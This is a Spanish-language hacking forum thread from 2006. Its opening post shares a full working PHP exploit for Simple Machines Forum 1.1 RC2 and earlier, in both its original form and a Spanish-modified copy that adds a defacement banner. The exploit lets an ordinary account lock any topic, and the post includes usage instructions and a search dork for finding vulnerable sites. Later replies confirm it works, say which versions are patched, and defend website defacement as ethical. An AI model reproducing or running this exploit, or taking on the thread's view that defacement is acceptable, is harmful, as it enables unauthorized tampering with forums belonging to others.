exploit para SMF...nuevo!

Started by xelit, August 24, 2006, 08:20:09 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

xelit

Querian un bug de SMF???...con este exploit podran cerrarle los pos a cualquier usuario del foro incluyendo al admin!

deven crear una cuenta
y la forma de mandarlo luego de compilarlo es esta

Forma de uso: smf.exe host path user pass topic OPTIONS
host:       Host donde se aloja el SMF, sin http
path:       Carpeta donde esta alojado
user:       Tu usuario en el foro
pass:       Tu Contraseña
lock:       Topic a cerrar

suerte!

ORIGINAL
#!/usr/bin/php -q -d short_open_tag=on
<?
print_r('
--------------------------------------------------------------------------------
Simple Machines Forum <= 1.1.RC2 "lock"/Zend_Hash_Del_Key_Or_Index Vulnerability
by rgod [email protected]
site: http://retrogod.altervista.org
dork, version specific: "Powered by SMF"
--------------------------------------------------------------------------------
');

if ($argc<6) {
print_r('
--------------------------------------------------------------------------------
Usage: php ".$argv[0]." host path user pass topic OPTIONS
host:       target server (ip/hostname)
path:       path to SMF
user/pass:  u need a valid user account
lock:       topic u want to lock
Options:
   -p[port]:    specify a port other than 80
   -P[ip:port]: specify a proxy
Examples:
php ".$argv[0]." localhost /smf/ user pass 4
php ".$argv[0]." localhost /smf/ user pass 3 -p81
php ".$argv[0]." localhost / user pass 7 -P1.1.1.1:80
--------------------------------------------------------------------------------
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}
function my_encode($my_string)
{
  $encoded="";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.="chr(".ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=").";}
  }
  return $encoded;
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$topic=(int)$argv[5];
$port=80;
$proxy="";

for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="user=".urlencode($user);
$data.="&passwrd=".urlencode($pass);
$data.="&cookielength=-1";
$data.="&hash_passwrd=";
$data.="&submit=Login";
$packet ="POST ".$p."index.php?action=login2 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
echo "cookie -> ".$cookie."\r\n";
$temp=explode("PHPSESSID=",$cookie);
$temp2=explode(";",$temp[1]);
$sessid=$temp2[0];
echo "sessid -> ".$sessid."\r\n";
$temp=explode(";member=",$html);
$temp2=explode("\n",$temp[1]);
$uid=(int)$temp2[0];
echo "user id -> ".$uid."\r\n";

$packet="GET ".$p."index.php?action=post;topic=$topic.0;num_replies=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode('name="sc" value="',$html);
$temp2=explode("\"",$temp[1]);
$sc=$temp2[0];
echo "sc code -> ".$sc."\r\n";
$temp=explode('"num_replies" value="',$html);
$temp2=explode("\"",$temp[1]);
$replies=$temp2[0];
echo "num replies -> ".$replies."\r\n";

$hash_1="173250926";
$hash_2="266332046";

$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="topic"

'.$topic.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="subject"

I totally disagree, locked.
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="icon"

xx
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="message"

I totally disagree, locked.
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="notify"

0
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="lock"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="'.$hash_1.'"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="'.$hash_2.'"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="sticky"

0
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="move"

0
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="attachment[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="post"

Post
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="num_replies"

'.$replies.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="additional_options"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="sc"

'.$sc.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="seqnum"

0
-----------------------------7d61bcd1f033e--
';

$packet="POST ".$p."index.php?action=post2;start=3;board=".$board." HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="X-FORWARDED-FOR: 1.1.1.1\r\n";
$packet.="Referer: http://".$host.$path."index.php?action=post;topic=1.0;num_replies=0\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

$packet= "GET ".$p."index.php?action=post;topic=$topic.0;num_replies=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="X-FORWARDED-FOR: 1.1.1.1\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if  (strstr($html,"This topic is locked")) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>


MODIFICADO AL ESPAÑOL
#!/usr/bin/php -q -d short_open_tag=on
<?
print_r('
--------------------------------------------------------------------------------
SMF 1.1 RC2 - Cierra posts
Creado por rgood - Modificado por ElGroxo
Site: www.c-group.org
Para buscar pag. vulnerables: "Powered by SMF"
--------------------------------------------------------------------------------
');

if ($argc<6) {
print_r('
--------------------------------------------------------------------------------
Forma de uso: smf.exe host path user pass topic OPTIONS
host:       Host donde se aloja el SMF, sin http
path:       Carpeta donde esta alojado
user:       Tu usuario en el foro
pass:       Tu Contraseña
lock:       Topic a cerrar
Options:
   -p[port]:    Si la web no se aloja en el puerto 80
   -P[ip:port]: Para usar proxy
Ejemplo
smf.exe foro.elhacker.net ElGroxo 123123 8.0
--------------------------------------------------------------------------------
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No se recibieron respuestas de  '.$host.':'.$port; die;
    }
  }
  else {
$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'El proxy no es valido...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No se recibieron respuestas del proxy...';die;
}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}
function my_encode($my_string)
{
  $encoded="";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.="chr(".ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=").";}
  }
  return $encoded;
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$topic=(int)$argv[5];
$port=80;
$proxy="";

for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="user=".urlencode($user);
$data.="&passwrd=".urlencode($pass);
$data.="&cookielength=-1";
$data.="&hash_passwrd=";
$data.="&submit=Login";
$packet ="POST ".$p."index.php?action=login2 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
echo "cookie -> ".$cookie."\r\n";
$temp=explode("PHPSESSID=",$cookie);
$temp2=explode(";",$temp[1]);
$sessid=$temp2[0];
echo "sessid -> ".$sessid."\r\n";
$temp=explode(";member=",$html);
$temp2=explode("\n",$temp[1]);
$uid=(int)$temp2[0];
echo "user id -> ".$uid."\r\n";

$packet="GET ".$p."index.php?action=post;topic=$topic.0;num_replies=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode('name="sc" value="',$html);
$temp2=explode("\"",$temp[1]);
$sc=$temp2[0];
echo "sc code -> ".$sc."\r\n";
$temp=explode('"num_replies" value="',$html);
$temp2=explode("\"",$temp[1]);
$replies=$temp2[0];
echo "num replies -> ".$replies."\r\n";

$hash_1="173250926";
$hash_2="266332046";

$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="topic"

'.$topic.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="subject"

[color=red][size=80pt]ElGroxo Rollz[/size][/color]
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="icon"

xx
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="message"


[color=red][size=80pt]ElGroxo cerro este post[/size][/color]
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="notify"

0
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="lock"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="'.$hash_1.'"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="'.$hash_2.'"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="sticky"

0
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="move"

0
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="attachment[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="post"

Post
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="num_replies"

'.$replies.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="additional_options"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="sc"

'.$sc.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="seqnum"

0
-----------------------------7d61bcd1f033e--
';

$packet="POST ".$p."index.php?action=post2;start=3;board=".$board." HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="X-FORWARDED-FOR: 1.1.1.1\r\n";
$packet.="Referer: http://".$host.$path."index.php?action=post;topic=1.0;num_replies=0\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

$packet= "GET ".$p."index.php?action=post;topic=$topic.0;num_replies=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="X-FORWARDED-FOR: 1.1.1.1\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if  (strstr($html,"Topic cerrado")) {echo "Exploit succeeded...";}
else {echo "Fallo el exploit...";}
?>


gentileza de c-groups

_xXx_

pss yo logre hacer esto con ese exploit  ;D


josealcuevas

Que bien, has SPAM de hackpr y c-group.... solo recomienda...


Komtec1

the_hacker_666

Quote from: _xXx_ on August 29, 2006, 02:10:43 AM
pss yo logre hacer esto con ese exploit  ;D



como se que no usaste Microsoft Paint para editar y poner tu oracion ahi?? danos un link

josealcuevas

Si lo hizo man, aparte yo creo que ya lo corrigireron...


Komtec1

the_hacker_666

Bueno, entonces confirmamos ese exploit? lo he visto ya en muchos lados :D

josealcuevas

si el expliot funciona....


Komtec1

::: Lot3k :::

Ok entonces probaremos para ver si es correcto el exploit , ojala por que ya tiene rato que no veo uno de esos de SMF jejeje,.

ElecBoy

El exploit solo Funciona con las versiones de 1.1 RC2 para abajo. Ya la version 1.1 RC3 y 1.0.8 ya estan correjidas de este error.
-[ElecBoy]
HackPR.NET


"Tell me and I forget.  Teach me and I remember.  Involve me and I learn."        
                                     — Benjamin Franklin

Big-Peru_

Pues , yo creo que ese bug, solo rula a la mala configuracion del foro, ademas no creo sea la gran cosa cerrar topics, si bien es cierto lo de action = lock (topic) numero del topic  (sec) inicio de secion  tuyo el modo comun si eres administrador o moderador para cerrar dicho topic, es la forma correcta ,claro que se puede simular la entrada , PERO SOLO PERMITE por una mala configracion del foro, saludos  :P

freak 

Quote from: ElecBoy on September 04, 2006, 01:10:03 PM
El exploit solo Funciona con las versiones de 1.1 RC2 para abajo. Ya la version 1.1 RC3 y 1.0.8 ya estan correjidas de este error.

estas ekivokado elec .. modificando el exploit se puede hacer lo mismo en los foros ke mencionas . hay algo ke lo hace vulnerable .


Quote from: Big-Peru_ on September 04, 2006, 02:40:14 PM
Pues , yo creo que ese bug, solo rula a la mala configuracion del foro, ademas no creo sea la gran cosa cerrar topics, si bien es cierto lo de action = lock (topic) numero del topic  (sec) inicio de secion  tuyo el modo comun si eres administrador o moderador para cerrar dicho topic, es la forma correcta ,claro que se puede simular la entrada , PERO SOLO PERMITE por una mala configracion del foro, saludos  :P


no se debe a eso y pronto saldra otro exploit :O

Big-Peru_

Huaz, por lo que fuese, estoy lejos de practicar bugcitos, POR MALA CONFIGURACION, ni tienen el nivel a ser un Bug, por alcontrario un Hoax xd, QUE TIEMPOS AQUELLOS QUE LOS BUGS del smf daban el hash md5 y los que explotaban podian ser admin de cualquier foro, porque duro el bug buen tiempo  :P, (y habia variables...)
Quoteno se debe a eso y pronto saldra otro exploit :O
Huaz
saludos  :P

xelit

QuoteHuaz, por lo que fuese, estoy lejos de practicar bugcitos, POR MALA CONFIGURACION, ni tienen el nivel a ser un Bug, por alcontrario un Hoax xd, QUE TIEMPOS AQUELLOS QUE LOS BUGS del smf daban el hash md5 y los que explotaban podian ser admin de cualquier foro, porque duro el bug buen tiempo  , (y habia variables...)

:o...supongo que eres el super defacer....y estas equivocado...NO ES POR MALA CONFIGURACION....pero si crees eso...
QuoteTIEMPOS AQUELLOS QUE LOS BUGS del smf daban el hash md5
pues si no te gusta o estas tan lejos de practicar con bugcitos...presentanos el nuevo bug para SMF..porque que yo sepa no te vi en ningun lado con algo asi...antes de criticar algo que costo trabajo hacer y se esta publicando libremente estudia un poquito y si tienes algo mejor postealo

Big-Peru_

Quotepues si no te gusta o estas tan lejos de practicar con bugcitos...presentanos el nuevo bug para SMF..porque que yo sepa no te vi en ningun lado con algo asi...antes de criticar algo que costo trabajo hacer y se esta publicando libremente estudia un poquito y si tienes algo mejor postealo
Huaz, mejor que o sepas quien soy, ademas no se porque postie aca, no se que medio, recorar viejos momentos, no vengo a dar clases ni nada de eso, solo puse un comentario.
Quotesupongo que eres el super defacer....y estas equivocado...NO ES POR MALA CONFIGURACION....pero si crees eso...
nada de eso, solo sé lo necesario, no me gusta nada de deface, me parece poco etico y nada de hack, he practicado cada bug que ya me canse de explotarlo, ahora he cambiado y prefiero apoyar y si puedo dar un comentario,saludos
pd, tengo mas 20 nick en la web, creo que no voy a postear mas en este foro de hack General,

xelit

No..no se quien sos..si pones alguno de tus 20 nik (el mas conocido) talvez te ubique pero son ese no..

Con respecto a lo otro que dijiste...como en todo lo que tenga que ver con la humanidad esta lo bueno y lo malo...esta el que entra y destruye...y el que ayuda e informa...
Quoteme parece poco etico y nada de hack

No le veo nada de "poco etico" cambiar un index..poner tu e-mail y ayudar a un webmaster...es mas...me parece bien!..no destruirle la web porque siempre hay alguien que sabe mas que uno...en este caso..vos podes saber mas que yo y nadie lo discute...pero el echo de ayudar a alguien y hacer de nuestro ambito(la web) un lugar mas seguro me parece correcto...sabes cual es el problema??..que muchos admin si les decis su problema no te dan bola...solo dicen si si...es mas..algunos se enojan por decirles su bug...en cambio si le cambias el index les das como un golpe para que se den cuenta y progresen...ese es mi punto de vista...estoy totalmente en contra de lo que no tiene etica pero me parece que esta oportunidad no tiene que ver con eso

Saludos,Xelit

PD:Veo que repuntaron el foro gente...los felicito!...y me alegro mucho de verdad ;)

freak 

Quote from: Big-Peru_ on September 08, 2006, 02:40:59 PM
Huaz, mejor que o sepas quien soy, ademas no se porque postie aca, no se que medio, recorar viejos momentos, no vengo a dar clases ni nada de eso, solo puse un comentario. nada de eso, solo sé lo necesario, no me gusta nada de deface, me parece poco etico y nada de hack, he practicado cada bug que ya me canse de explotarlo, ahora he cambiado y prefiero apoyar y si puedo dar un comentario,saludos
pd, tengo mas 20 nick en la web, creo que no voy a postear mas en este foro de hack General,


loko mira tenes razon en una parte .. y en otra no ... gracias a los pokos eticos (los defacers) los sitios webs son cada vez mas seguros ... y la informatica avanza gracias a los hackers.. al menos ese es mi punto de vista ..yo tambien tenia web .. y la subi sabiendo ke alguno de los defacers me la podria defacear ... y ke? .. son gajes del oficio .. mi web pronto estara on de nuevo y bueno te invito a ke la defacees vos o kien kiera .. si eso los hace felices ... ya ke el ke a deface nace a deface muere XD ... y para mi es un bug el de smf ... ya ke un user comun es el ke cierra los post y no el admin :D ... el hash de los smf ... mmm raro .. pero en un lugar lo eh visto ... luego posteo screen XD ...

PD: si me defacean no me avergonzara si no ke me motivara a esforzarme por ser un mejor programador :D de sitios webs :D

::: Lot3k :::

Que buen consepto freak , creo que estamos en las mismas. ;D
Un saludo

SnO.opy

Es Cierto Lot3k muy buen concepto .. pero creo que se salieron mucho del tema .. empezaron con el SMF y acabron peleando por algo insignificativo como el ser mejor que uno ....

Es Mejor no decir nada aque decir algo y acabar mal.."La persona que nunca comete un error es la persona que no hace nada"


SnO.opy